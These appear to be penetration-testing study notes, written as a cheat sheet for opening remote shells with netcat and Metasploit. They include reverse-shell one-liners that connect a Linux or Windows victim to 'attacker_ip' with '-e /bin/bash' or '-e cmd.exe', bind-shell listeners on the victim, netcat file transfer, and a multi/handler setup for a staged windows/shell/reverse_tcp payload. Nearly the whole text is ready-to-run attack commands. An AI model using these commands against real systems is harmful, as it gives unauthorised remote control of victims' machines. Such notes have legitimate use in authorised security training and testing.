Create reverse shell listener

Refs:

• Staged vs. non-stage handler: https://buffered.io/posts/staged-vs-stageless-handlers/

Netcat to establish connection

• Listen on TCP/UDP port for reverse shell: nc -nlvp 5678
• Connect to a netcat port: nc -nv $ip 5678
• Send a file using netcat: nc -nv $ip 5678 < /usr/share/windows-binaries/wget.exe
• Receive a file using netcat: nc -nlvp 5678 > incoming.exe
• Avoid using 4444 as other students may use it also.
• Set ftp to binary to upload exe file: ftp> binary

root@kali:~# nc -h

• -c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
• -l listen mode, for inbound connects
• -n numeric-only IP addresses, no DNS
• -p port local port number
• -v verbose [use twice to be more verbose]
• -e /bin/bash for Linux victim and -e cmd.exe for Windows victim

Create reverse shell using nc.exe (Easier to bypass firewall)

• -e /bin/bash for Linux victim and -e cmd.exe for Windows victim
• Victim can ping attacker
• Attacker to listen: nc -nlvp 4444
• Linux victim to execute reverse shell: nc -nv attacker_ip 4444 -e /bin/bash
• Windows victim to execute reverse shell: nc.exe -nv attacker_ip 4444 -e cmd.exe

Create direct shell using nc.exe

• -e /bin/bash for Linux victim and -e cmd.exe for Windows victim
• Attacker can ping victim
• Windows victim to listen: nc.exe -nlvp 4444 -e cmd.exe
• Linux victim to listen: nc -nlvp 4444 -e /bin/bash
• Attacker to connect to victim: nc -nv victim_ip 4444

Create shell listener FIRST

• For UNSTAGED reversed shell: nc -nlvp 5678
• For STAGED reversed shell: (Ref: this https://blog.rapid7.com/2009/12/28/exploiting-microsoft-iis-with-metasploit)

• msfconsole
• msf> use exploit/multi/handler
• msf (handler) > set PAYLOAD windows/shell/reverse_tcp
• msf (handler) > set LHOST Attacker_IP
• msf (handler) > set LPORT 5678
• msf (handler) > set ExitOnSession false
• msf (handler) > exploit -j
• msf exploit(handler) > sessions -i 1
• meterpreter > shell